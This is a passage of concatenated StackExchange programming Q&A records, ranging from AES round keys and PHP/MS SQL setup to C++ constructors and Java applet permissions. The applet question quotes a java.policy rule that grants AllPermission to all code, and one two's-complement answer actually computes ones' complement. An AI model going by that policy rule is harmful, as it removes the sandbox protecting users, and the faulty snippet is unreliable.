typically do 2; both options are justifiable in software.\nComment: Reversing the key schedule calculations on-the-fly for decryption doesn't actually need an inverse S-box. It still uses the regular S-box.\nComment: @Craig McQueen: you are absolutely right! Fixed the answer accordingly.\nAnswer: I've implemented AES-128 with byte calculations for a small embedded systems, with optional on-the-fly key schedule calculation. See aes-min on github.\nThe key schedule starting point for decryption must be obtained by running the key schedule calculation forwards, calculating all the rounds of the key schedule, to get to the last round. For a particular key, that decryption key schedule starting point only needs to be done once and saved. After that, the on-the-fly-key-schedule decryption runs the key schedule calculation backwards during each decryption operation.\nReversing the key schedule calculation requires the forwards S-box, so on-the-fly-key-schedule decryption requires both the forwards and inverse S-boxes.\nAnswer: The simplest way to perform the AES key expansion for decryption is to do it just as for encryption, but storing the subkeys as they are generated, rather than using them. Then use them for decryption, just in the reverse of the order they where produced.\nAnother option, often used in hardware (much less useful in software), and relatively simple since it's AES-128, is to sequentially compute the last subkey, again just as for encryption; use it; then repeatedly walk back to the previous ones using the fact that the transformation from one subkey to the next is easily reversed. This saves RAM, trading is against computation.\nBoth methods use that the 11 subkeys (the first of which is the key) are the same for encryption and decryption, only used is the natural order they are produced for encryption, and the reverse order for decryption.\nComment: So you mean that I should store the different key each round in a variable. So the inverse key expansion is the same but it will be preformed before the actual decryption. So the inverse key expansion will first create 9 different round keys and store them. Right after that the decryption process will take place with the round keys in the reverse order?\nComment: @Ilay Samuelov: there are 11 AddRoundKeys. The first one is the key itself. The last is used right after being generated, thus needs not absolutely be stored if you redo the key schedule for each block. So you can get away with storing 9 subkeys, and special-case the first (last used in decryption) and last (first used) of the 11 subkeys. Still, the simplest is to make an array with the 11 subkeys, And you need at least 10 + the initial key for speed with multiple blocks.\nComment: Hey! In x86 it can be a bit hard to do that. But I thought on a way! Maybe storing al the round keys in order i a big one array. Then taking the last 16 bits by doing: `Arr[160]-arr[144]`\nComment: @Ilay Samuelov: please don't make numerous separate comments, especially within the time allowance for editing these. That eats vertical space and other resources, and can raise automated alerts. The process of joining comments is largely manual, tedious, error-prone, and reserved to mods.\n","meta":{"source":"crypto.stackexchange","title":"On-the-fly computation of AES Round Keys for decryption?","dup_signals":{}},"subset":"stackexchange"} +{"text":"PHP 5.4 connection to MS SQL server 2008 r2\n\nQuestion: Am want to connect to an existing MS-SQL database on local host i have installed MS-SQL drivers 3.0 and edited php.ini to enable the extension i.e.\n<code> extension=php_sqlsrv_54_ts.dll\n<\/code>\ni have installed native client 10.0 and get this error:\n<code>array (size=2)\n 0 => \n array (size=6)\n 0 => string 'IMSSP' (length=5)\n 'SQLSTATE' => string 'IMSSP' (length=5)\n 1 => int -49\n 'code' => int -49\n 2 => string 'This extension requires the Microsoft SQL Server 2012 Native Client. Access the following URL to download the Microsoft SQL Server 2012 Native Client ODBC driver for x86: http:\/\/go.microsoft.com\/fwlink\/?LinkId=163712' (length=216)\n 'message' => string 'This extension requires the Microsoft SQL Server 2012 Native Client. Access the following URL to download the Microsoft SQL Server 2012 Native Client ODBC driver for x86: http:\/\/go.microsoft.com\/fwlink\/?LinkId=163712' (length=216)\n<\/code>\nIf i try to install Microsoft SQL Server 2012 Native Client the error is operating system not supported.\nThe server is running MS Server 2008 R2, MS-SQL 2008 R2 and Apache 2.4.4 \nComment: Did you get the right version? Can't install a 64bit native client on a 32bit os, or vice versa\nComment: The server is 64 bit, the native client installer installs both 64 and 32 bit or so i seem to understand here\nAnswer: From the error message it seems you need to download and install \"Microsoft SQL Server 2012 Native Client ODBC driver for x86\" which should be available from here:\nhttp:\/\/www.sqlservercentral.com\/Forums\/Topic1458276-2799-1.aspx\nMake sure you get the right version of Native Client for your operating system\nthat page has all links on getting MSQL working for you.\nComment: OK tried everything on the page but still not working, got an idea how why native client 2012 will not install? I am running update on the server now which should fix windows installer compatibility issue\n","meta":{"source":"stackoverflow","title":"PHP 5.4 connection to MS SQL server 2008 r2","dup_signals":{}},"subset":"stackexchange"} +{"text":"Two's Complement algorithm in Python\n\nQuestion: I have to do a two's complement conversion of a 3D surface, each element representing a 12 bit two's complement number.\nIn order to convert the array I have the following code:\n<code>for x in np.nditer(array, op_flags=['readwrite']):\n x[...] = twos_comp(x, 12)\n<\/code>\nwhere I found the following function online:\n<code>def twos_comp(val, bits):\n\"\"\"compute the 2's complement of int value val\"\"\"\nif (val & (1 << (bits - 1))) != 0: # if sign bit is set e.g., 8bit: 128-255\n val = val - (1 << bits) # compute negative value\nreturn val\n<\/code>\nHowever, the result I'm getting doesn't make any sense. Is my code wrong?\nThe other thing I have tried is:\n<code> for x in np.nditer(array, op_flags=['readwrite']):\n if x > 2047:\n x[...] = (2047 - x)\n else:\n x[...] = x\n<\/code>\nbut again the data doesn't look \"right\". Any suggestions?\nThanks\nBy \"not right\" I mean that I'm expecting a surface that looks like\n\nBut, instead I'm getting a surface that looks like this (there is also a multiplier of 80 that explains why the numbers in the z-axis are so large)\nComment: what do you mean by \"doesn't make any sense\" and \"doesn't look right\". Could you share some sample and show what is returned vs. what **should** be returned? In short a [mcve] would help a lot :)\nAnswer: Some relative contents are already available here:\nPython - Most effective way to implement two's complement?\nand here:\nTwo's Complement in Python\nComment: Thanks, I've read most of them and that's where I've got my existing code from. Does `np.nditer(array, op_flags=['readwrite'])` do what I think it does? That is loop through every element of the array, updating the value by the result of the code in the loop\nAnswer: Use this simple function\n<code>def twos_comp(val):\n return 0b111111111111 - val # 12 ones\n<\/code>\nYou may test it with\n<code>val = 0b111100001111\nprint(\"{:012b}\".format(twos_comp(val)))\n<\/code>\nand you will got\n\n000011110000\n\nIf it is not what you wanted, use this function instead\n<code>def twos_comp(val):\n return 0b1000000000000 - val # 1 with 12 zeroes\n<\/code>\nComment: Thank you, I think this has got it. Any idea why I'm getting a negative of what I expect?\n","meta":{"source":"stackoverflow","title":"Two's Complement algorithm in Python","dup_signals":{}},"subset":"stackexchange"} +{"text":"python matplotlib: label in histogram\n\nQuestion: I am using Python (3.4) Jupyter Notebook. I tried to plot a histogram with label using the code below. \n<code> %matplotlib notebook\n import matplotlib.pyplot as plt\n import matplotlib\n import numpy as np\n\n bins = np.linspace(0, 1.0, 40)\n\n plt.hist(good_tests, bins, alpha = 0.5, color = 'b' , label = 'good')\n plt.show()\n<\/code>\nBut the label 'good' doesn't show at all. Did I miss anything? Thanks!\nAnswer: you need to add a legend. See legend for details.\n<code>plt.legend()\n<\/code>\n","meta":{"source":"stackoverflow","title":"python matplotlib: label in histogram","dup_signals":{}},"subset":"stackexchange"} +{"text":"Bitwise operations (shifting return values)\n\nQuestion: <code>if (((number >> i) & 1) == 1)<\/code>\nthis is my code example.\nHow is the return value determined in this operation? We shift numbers to the right or left. what is the return value?\n<code>if (((number >> i) & 1) == 1)<\/code>\nComment: (number >> i) will shifter number i times to the right. Then \"& 1\" will AND that with 1, which will be either 1 or 0. And lastly we check if it actually was a 1. So the whole if statement checks if bit i is set in number.\nComment: See [Bitwise logic](https:\/\/en.cppreference.com\/w\/c\/language\/operator_arithmetic#Bitwise_logic), [Shift operators](https:\/\/en.cppreference.com\/w\/c\/language\/operator_arithmetic#Shift_operators) and [Equality operators](https:\/\/en.cppreference.com\/w\/c\/language\/operator_comparison#Equality_operators). In general: [Expressions](https:\/\/en.cppreference.com\/w\/c\/language\/expressions)\nAnswer: <code>number >> i<\/code> bitwise-shifts <code>number<\/code> to the right by <code>i<\/code> bits:\n<code> number i number >> i\n ------ - -----------\n01010101 1 00101010\n01010101 2 00010101\n01010101 3 00001010\n<\/code>\netc.\n<code>(number >> i) & 1<\/code> does a bitwise-AND of <code>number >> 1<\/code> against <code>1<\/code>:\n<code> 00101010 (01010101 >> 1)\n& 00000001\n----------\n 00000000\n\n 00010101 (01010101 >> 2)\n& 00000001\n----------\n 00000001\n<\/code>\nSo basically,\n<code>if (((number >> i) & 1) == 1)\n<\/code>\nwill branch if the low bit of the shifted value is set.\nAnswer: \nHow is the return value determined in this operation?\n\nThere is no return value. There is an if statement with the equality operator\n<code>if (((number >> i) & 1) == 1)\n<\/code>\nThe result of the equality operator is value <code>0<\/code> or <code>1<\/code> of the type <code>int<\/code> dependent on whether two operands, <code>((number >> i) & 1)<\/code> and <code>1<\/code>, of the expression are unequal or equal to each other correspondingly. If the result is <code>1<\/code> (operands are equal each other) then the sub-statement of the if statement will get the control.\nSo the of statements checks whether the <code>i-th<\/code> bit of <code>number<\/code> is set to 1 or to 0.\nAnswer: <code>>><\/code> is a right-shift operator in C language.\nIt depends on three factors that the result of <code>((number >> i) & 1)<\/code> would be.\n\nThe type of the <code>number<\/code> is either signed or unsigned.\nThe total size in bit of the <code>number<\/code>, i.e. 8*sizeof(number).\nThe value of <code>i<\/code>.\n\n<code>number<\/code> is signed\n<code>number<\/code> is unsigned\n\nThe value of <code>i<\/code> >= The total size in bit of the <code>number<\/code>\nthe signed bit of <code>number<\/code>\n0\n\nThe value of <code>i<\/code> < The total size in bit of the <code>number<\/code>\nthe <code>i<\/code>-th bit of <code>number<\/code> (LSb is 0-th bit)\nthe <code>i<\/code>-th bit of <code>number<\/code> (LSb is 0-th bit)\nComment: Shifting signed integers right is implementation-defined. Not all implementations shift in copies of the sign bit.\n","meta":{"source":"stackoverflow","title":"Bitwise operations (shifting return values)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Match pattern with and without spaces\n\nQuestion: I am using markjs to search a page and highlight things that would be considered dice rolls. So it using the regex expression <code>\/([1-9]\\d*)?d(?:4|6|8|10|12|20)([+-]\\d+)?\/i<\/code> which actually works pretty well when the text is formatted as so <code>1d10+2<\/code> however if the text has any spaces, it only grabs highlights the first part. For example, if the same thing is written as <code>1d10 + 2<\/code> it will only highlight the <code>1d10<\/code>.\nIs there something I can adjust in my regex that will account for spaces around the <code>+<\/code> or <code>-<\/code> symbols?\nComment: Just include `\\s*` where ever there is a possibility of spaces. [Shown here](https:\/\/regex101.com\/r\/KQkjUz\/1\/)\nAnswer: you can use the <code>\\s<\/code> for blank spaces, so your regex could be something like this:\n<code>([1-9]\\d*)?d(?:4|6|8|10|12|20)\\s?([+-]\\s?\\d+)\n<\/code>\nComment: you ever hate when something works on the jsfiddle and not what you're actually trying to get it to work on. This appears to be working on jsfiddle but not my chrome extension. So I'll have to play around some.\n","meta":{"source":"stackoverflow","title":"Match pattern with and without spaces","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can not set a selector to background of RadioButton\n\nQuestion: I got a strange error when I try to set a selector to background of RadioButton.\nMy layout is simply:\n\n<code><android.support.v4.view.ViewPager\n android:id=\"@+id\/viewpager\"\n android:layout_width=\"match_parent\"\n android:layout_height=\"0dp\"\n android:layout_weight=\"1\" \/>\n\n<RadioGroup\n android:layout_width=\"match_parent\"\n android:layout_height=\"wrap_content\"\n android:orientation=\"horizontal\" >\n\n <RadioButton\n android:id=\"@+id\/rbtnPhoto\"\n android:layout_width=\"0dp\"\n android:layout_height=\"wrap_content\"\n android:layout_weight=\"1\"\n android:background=\"@drawable\/icon_photo_selector\" \/>\n\n <RadioButton\n android:id=\"@+id\/rbtnTagline\"\n android:layout_width=\"0dp\"\n android:layout_height=\"wrap_content\"\n android:layout_weight=\"1\"\n android:background=\"@drawable\/icon_tagline_selector\" \/>\n\n <RadioButton\n android:id=\"@+id\/rbtnTranslator\"\n android:layout_width=\"0dp\"\n android:layout_height=\"wrap_content\"\n android:layout_weight=\"1\"\n android:background=\"@drawable\/icon_translator_selector\"\/>\n\n <RadioButton\n android:id=\"@+id\/rbtnDiscount\"\n android:layout_width=\"0dp\"\n android:layout_height=\"wrap_content\"\n android:layout_weight=\"1\"\n android:background=\"@drawable\/icon_discount_selector\" \/>\n<\/RadioGroup>\n<\/code>\n\nAnd my selector is:\n<code><selector xmlns:android=\"http:\/\/schemas.android.com\/apk\/res\/android\">\n\n <item android:drawable=\"@drawable\/icon_photo_selected\" android:state_checked=\"true\"><\/item>\n <item android:drawable=\"@drawable\/icon_photo_unselected\" android:state_checked=\"false\"><\/item>\n\n<\/selector>\n<\/code>\nAbove drawables are nine path images. I alway get the exception which is \"android.view.InflateException: Binary XML file line\". But the layout can be inflate if I change a selector by an image.\nPlease help me to resolve it.\nUpdated:\nMy images are nice patch images\nHere is my logs:\n<code> 12-09 15:36:07.256: E\/AndroidRuntime(15211): FATAL EXCEPTION: main\n12-09 15:36:07.256: E\/AndroidRuntime(15211): java.lang.RuntimeException: Unable to start activity ComponentInfo{com.paktor\/com.paktor.MainActivity}: android.view.InflateException: Binary XML file line #39: Error inflating class <unknown>\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:1960)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:1985)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.app.ActivityThread.access$600(ActivityThread.java:127)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1151)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.os.Handler.dispatchMessage(Handler.java:99)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.os.Looper.loop(Looper.java:137)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.app.ActivityThread.main(ActivityThread.java:4482)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at java.lang.reflect.Method.invokeNative(Native Method)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at java.lang.reflect.Method.invoke(Method.java:511)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:794)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:561)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at dalvik.system.NativeStart.main(Native Method)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): Caused by: android.view.InflateException: Binary XML file line #39: Error inflating class <unknown>\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.view.LayoutInflater.createView(LayoutInflater.java:606)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at com.android.internal.policy.impl.PhoneLayoutInflater.onCreateView(PhoneLayoutInflater.java:56)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.view.LayoutInflater.onCreateView(LayoutInflater.java:653)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.view.LayoutInflater.createViewFromTag(LayoutInflater.java:678)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.view.LayoutInflater.rInflate(LayoutInflater.java:739)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.view.LayoutInflater.rInflate(LayoutInflater.java:742)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.view.LayoutInflater.inflate(LayoutInflater.java:489)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.view.LayoutInflater.inflate(LayoutInflater.java:396)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.view.LayoutInflater.inflate(LayoutInflater.java:352)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at com.paktor.fragments.HomeVer3Fragment.onCreateView(HomeVer3Fragment.java:23)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.support.v4.app.Fragment.performCreateView(Fragment.java:1500)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.support.v4.app.FragmentManagerImpl.moveToState(FragmentManager.java:927)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.support.v4.app.FragmentManagerImpl.moveToState(FragmentManager.java:1104)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.support.v4.app.BackStackRecord.run(BackStackRecord.java:682)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.support.v4.app.FragmentManagerImpl.execPendingActions(FragmentManager.java:1467)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.support.v4.app.FragmentActivity.onStart(FragmentActivity.java:570)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at com.paktor.MainActivity.onStart(MainActivity.java:91)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.app.Instrumentation.callActivityOnStart(Instrumentation.java:1135)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.app.Activity.performStart(Activity.java:4740)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:1933)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): ... 11 more\n12-09 15:36:07.256: E\/AndroidRuntime(15211): Caused by: java.lang.reflect.InvocationTargetException\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at java.lang.reflect.Constructor.constructNative(Native Method)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at java.lang.reflect.Constructor.newInstance(Constructor.java:417)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.view.LayoutInflater.createView(LayoutInflater.java:586)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): ... 30 more\n12-09 15:36:07.256: E\/AndroidRuntime(15211): Caused by: java.lang.StackOverflowError\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at java.lang.ref.FinalizerReference.add(FinalizerReference.java:48)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.content.res.XmlBlock$Parser.<init>(XmlBlock.java:78)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.content.res.XmlBlock.newParser(XmlBlock.java:71)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.content.res.Resources.loadXmlResourceParser(Resources.java:2128)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.content.res.Resources.loadDrawable(Resources.java:1918)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.content.res.Resources.getDrawable(Resources.java:664)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.graphics.drawable.StateListDrawable.inflate(StateListDrawable.java:173)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.graphics.drawable.Drawable.createFromXmlInner(Drawable.java:867)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.graphics.drawable.Drawable.createFromXml(Drawable.java:804)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.content.res.Resources.loadDrawable(Resources.java:1920)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.content.res.Resources.getDrawable(Resources.java:664)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.graphics.drawable.StateListDrawable.inflate(StateListDrawable.java:173)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.graphics.drawable.Drawable.createFromXmlInner(Drawable.java:867)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.graphics.drawable.Drawable.createFromXml(Drawable.java:804)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.content.res.Resources.loadDrawable(Resources.java:1920)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.content.res.Resources.getDrawable(Resources.java:664)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.graphics.drawable.\n<\/code>\nAnswer: You forgot the <code><selector><\/code>-tags:\n<code><?xml version=\"1.0\" encoding=\"utf-8\"?>\n<selector xmlns:android=\"http:\/\/schemas.android.com\/apk\/res\/android\" >\n<item android:drawable=\"@drawable\/icon_photo_selected\" android:state_checked=\"true\" \/>\n<item android:drawable=\"@drawable\/icon_photo_unselected\" android:state_checked=\"false\" \/>\n<\/selector>\n<\/code>\nI think this should fix your problem\nComment: maybe changing the `` to `` helps\nComment: otherwise have a look at following thread: http:\/\/stackoverflow.com\/a\/3576744\/995320\nComment: It's a mistake when I was copying my selector. selector tag was not missing.\nComment: still can't create drawable from xml. As I remember I have done it but now I can't. It's strangely\nComment: Sorry everyone. I have a mistake in one of selectors. Thank for your supports\nAnswer: Change your selector to:\n<code><?xml version=\"1.0\" encoding=\"utf-8\"?> \n<selector xmlns:android=\"http:\/\/schemas.android.com\/apk\/res\/android\"> \n<item android:drawable=\"@drawable\/icon_photo_selected\" android:state_checked=\"true\"><\/item> \n<item android:drawable=\"@drawable\/icon_photo_unselected\" android:state_checked=\"false\"><\/item> \n<\/selector>\n<\/code>\nThe selector tags seems to be missing\nComment: IS your code working for normal images other than 9-patch ones ?\n","meta":{"source":"stackoverflow","title":"Can not set a selector to background of RadioButton","dup_signals":{}},"subset":"stackexchange"} +{"text":"Pass empty string to constructor\n\nQuestion: note: I am still new to c++, and while this may be a simple issue, yet I am unable to find a solution.\nPurpose:\nI would like to pass an empty string (as one would in java\/C#) to my constructor. I receive an error:\n<code>error: no matching function for call to 'ReturnObject::ReturnObject(ResultCode::ClientCode, const char [1])'\n return new ReturnObject(ResultCode::ClientCode::enum_FailedOpeningClientSocket, \"\");\n<\/code>\nThe <code>ReturnObject<\/code>'s purpose is to encapsulate an <code>enum<\/code> and a <code>string<\/code>.\nWhat does this error mean and how can I solve it?\nI have attempted changing my constructor parameter from <code>QString data<\/code> to <code>char data<\/code> and calling with <code>''<\/code> but that resulted in an error <code>empty character constant<\/code>.\ncalling code:\n<code>return new ReturnObject(ResultCode::ClientCode::enum_FailedSocketConnection, \"\");\n<\/code>\nheader:\n<code>class ReturnObject\n{\npublic:\n ReturnObject(ResultCode enum_code, QString data);\n\n QString getData();\n ResultCode getCode();\n\nprivate:\n ResultCode e_code;\n QString data_string;\n\n};\n<\/code>\nimplementation\n<code>#include \"returnobject.h\"\n\nReturnObject::ReturnObject(){\n data_string=\"WARN\";\n}\n\nReturnObject::ReturnObject(ResultCode enum_code, QString data)\n : e_code(enum_code)\n , data_string(data)\n{}\n\nResultCode ReturnObject::getCode()\n{\n return e_code;\n}\n\nQString ReturnObject::getData()\n{\n return data_string;\n}\n<\/code>\nThanks to wasthishelpful and a few comments, I made a tragic logic error which had me looking at the wrong parameter, the solution is that I should casting my enum class <code>ResultCode<\/code> which is the parent class to one of the nested <code>class<\/code>es, in this case <code>ClientCode<\/code>, as seen below from my enum class header\nenum.h\n<code>#ifndef ENUMS_H\n#define ENUMS_H\n\nclass ResultCode{\npublic:\n enum class LoginDialogCode{\n enum_LoginSuccess=0,\n enum_InternetOffline=1,\n enum_ServerOffline=2,\n enum_InvalidLoginPass=3,\n enum_EmptyLoginPass=4,\n enum_FailedRetreivingServerList=5,\n enum_TokenFailed=6\n };\n\n enum class ClientCode{\n enum_SentSuccess=10,\n enum_FailedOpeningClientSocket=11,\n enum_FailedClientSocketConnection=12,\n enum_FailedWritingtoClientSocket=13,\n enum_FailedReadingfromClientSocket=14\n };\n\n enum class ServerCode{\n enum_ReceivedSuccess=20,\n enum_FailedOpeningListenSocket=21,\n enum_FailedBindingtoListenSocket=22,\n enum_FailedAcceptingListenSocket=23,\n enum_FailedWritingtoListenSocket=24,\n enum_FailedReadingfromListenSocket=25\n };\n};\n\n#endif \/\/ ENUMS_H\n<\/code>\nComment: You expect a `ResultCode` but you pass a `ClientCode`.\nComment: There is no constructor that takes a `ResultCode::ClientCode` parameter, but you've been so sure that the second parameter is the problem that you've ignored the first.\nComment: What is the type of `ResultCode::ClientCode::enum_FailedSocketConnection`?\nComment: @GillBates How foolish of me, thanks for pointing that out\nComment: @molbdnilo thank you, I did not see that!\nAnswer: Your error is not on the second, but on the first parameter. From your question, I guess you have code like this:\n<code>struct ReturnCode\n{\n enum class ClientCode\n {\n enum_FailedSocketConnection,\n \/\/ other values\n };\n};\n<\/code>\nSo you ended up with two declared types: <code>ReturnCode<\/code> and <code>ReturnCode::ClientCode<\/code>. Looking at your constructor declaration:\n<code>`ReturnObject::ReturnObject(ResultCode enum_code, QString data)`\n<\/code>\nIt needs an object of type <code>ReturnCode<\/code> as first parameter, while looking at your call:\n<code>ReturnObject(ResultCode::ClientCode::enum_FailedSocketConnection, \"\")\n<\/code>\nYou pass an object of type <code>ReturnCode::ClientCode<\/code> as first parameter.\nYou may change your code like this:\n<code>class ReturnObject\n{\npublic:\n ReturnObject(ResultCode::ClientCode enum_code, QString data);\n\n QString getData();\n ResultCode::ClientCode getCode();\n\nprivate:\n ResultCode::ClientCode e_code;\n QString data_string;\n\n};\n<\/code>\nOnce you are here. You may consider taking the enumeration out of <code>ResultCode<\/code>:\n<code>enum class ClientCode\n{\n enum_FailedSocketConnection,\n \/\/ other values\n};\n\nclass ReturnObject\n{\npublic:\n ReturnObject(ClientCode enum_code, QString data);\n\n QString getData();\n ClientCode getCode();\n\nprivate:\n ClientCode e_code;\n QString data_string;\n\n};\n<\/code>\nThis follows the Zen of Python: \"Flat is better than nested\". IMHO this is also true in C++.\nEDIT:\nFrom your comments, we're here on an XY problem, and your code needs to be redesign. Here is a first proposition:\n<code>#include <type_traits>\n\nenum class ClientCode{\n \/\/ ...\n enum_FailedClientSocketConnection=12,\n \/\/ ...\n};\n\ntemplate<typename T>\nstruct ReturnObject\n{\n static_assert(std::is_enum<T>::value, \"T should be an enum\");\n\n const T e_code;\n const QString data_string;\n};\n\ntemplate<typename T>\nReturnObject<T> make_return_object(T e_code, std::string data_string)\n{\n return ReturnObject<T>{e_code, data_string};\n}\n\n\/\/ usage\n\nreturn make_return_object(\n ClientCode::enum_FailedClientSocketConnection, \"\"\n);\n<\/code>\nI removed the accessors <code>getData<\/code> and <code>getCode<\/code> for public const members: they are just read, and should not change for a given return object, so let them be public, with the const qualifier to prevent modification.\nI used templates to represent the code, with <code>static_assert<\/code> to check the given type is an enumeration.\nThe drawbacks are:\n\nYou can pass any enumeration, not only your result codes.\n<code>make_return_object<\/code> will return a different type for each different enumeration.\nComment: That should **NOT** be a cast :) You are here in a wrong design. I will propose you an answer, but I can't today\nComment: Hell yeah ! Thanks. One question though, you are almost correct with your derived code, see my update, I have a nested enum. I need cast my `ResultCode::enum_FailedOpeningClientSocket` as a `ResultCode::ClientCode` object. How should this be done, rather which should I use, dynamic or static?\nComment: Neither `dynamic_cast` nor `static_cast`: a nested type is not related to its \"nesting\" type and there can **not** be cast between them, as you could have when using inheritance. The nesting type acts here like a namespace with `private` and `protected` options. Why do you need `ResultCode`? Unless you want to pass any enum nested in `ResultCode`as argument to your functions, but I can't see the point here: if you need a `ClientCode`, you should not allow to pass anything else, and the way to do that is to declare the argument as a `ClientCode`\nComment: infact that is exactly why I need `ResultCode`, since I will using this ReturnObject in a few different classes, I require a class that I can insert any enum from `ResultCode` and a supporting string\/(char array). I just realized I do not require `ResultCode` as a `enum` but as a `struct` as you pointed out. But since I can insert any `enum` from `ResultCode`, I am required to typecast it do the appropriate `enum class`. That is what I am refering to, should this be a normal cast like `(ResultCode::ClientCode)ResultCode::ClientCode::enum_Failed...`. I am testing this now...\nComment: Thank you for the trouble, I have resorted to combining all enums into one class, for the moment. I eagerly await your proposed solution\/new design, I would love to get a fresh opinion on this!\nComment: I edited my answer with a first proposition. I guess it will be incomplete for you, but, without details on how you're using `ReturnObject`, your question is too broad. Maybe you will need a real type erasure like `variant`, or `any`. Feel free to edit your question with a complete use case\n","meta":{"source":"stackoverflow","title":"Pass empty string to constructor","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to find the minimum value of one variable in two functions using Mathematica?\n\nQuestion: How do I find the minimum value which satisfies the two equation below by using Mathematica? <code>d<\/code> and <code>w<\/code> in these equations are constant. The only variable is <code>a<\/code>.\n<code>y=-5 a^3 \ny=-a ((5 w d^2)\/4 + 5 w d) + (5 w d^2)\/2\n<\/code>\nI typed this into Mathematica but it is not working\n<code>MinValue[{-5 a w^2, (5 w d^2)\/2 - a (5 w d + (5 w d^2)\/4)}, {a}]\n<\/code>\nAnswer: If I understand your question, what you want to minimize is the value of <code>a<\/code> subject to the constraint of the equations. If so, the correct syntax is\n<code>MinValue[{a, -5 a w^2 == (5 w d^2)\/2 - \n a (5 w d + (5 w d^2)\/4)}, {a}] \/\/ Simplify\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"How to find the minimum value of one variable in two functions using Mathematica?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can I embed a silverlight sketchflow player in my web page?\n\nQuestion: Hi I'm new to silverlight and sketchflow. I'm getting on great with creating prototypes and can export to Word etc.\nI would really like to embed a prototype in another web page - is this possible and how would I go about it?\nThanks\nAnswer: Yes you can. The Silverlight SketchFlow player is a Silverlight application just like any other. \nHere is an msdn page about it:\nhttp:\/\/msdn.microsoft.com\/en-us\/library\/cc838145%28VS.95%29.aspx\nI also believe Expression Web has the ability to embed a SL project into a webpage for you if you aren't comfortable with html.\nAlso, 1 more option to explore is the package item on the file menu.\nAnswer: It's very easy.\n\nCreate you sketch flow app in Expression Blend.\nIn Visual Studio add an empty ASP.Net Website to the solution\nIn the properties of the ASP.Net Website, find the Silverlight tab. There you press Add and when happy with all the default settings, press add again. \n\nYou are good to go. You can host the Sketch Flow Player online, for you audience to start giving you the feedback ;)\n","meta":{"source":"stackoverflow","title":"Can I embed a silverlight sketchflow player in my web page?","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to grant permission to my applet\n\nQuestion: My applet gave me an access denied (<code>java.net.socket.Persmission<\/code>) ERROR just when I changed URL from <code>localhost:8090\/Project\/map.jsp<\/code> to <code>10.1.1.27:8090\/Project\/map.jsp<\/code> or when I tried to connect from another computer.\nso I looked for a solution and I found that I need to grant my applet Permission in file named java.policy at <code>C:\\Program Files (x86)\\Java\\jre1.8.0_40\\lib\\security<\/code>\nlike this:\n <code><< grant { permission java.security.AllPermission;}; >><\/code>\nbut it didn't work for me and I want to know why and how to specific my own applet with those permission.\nComment: Out of curiosity: what are using your applet for?\nComment: it's connected to a DB using a servlet and change the info to a graphic (position of trucks in the company's parking)\nComment: Is there a hard requirement to run your \"application\" in a browser? Because if not - you might simple **not** use an applet.\nComment: I didn't understand what did u mean by requirement ( hardware or codes)\nComment: I mean: what is the reason that you want to use Java 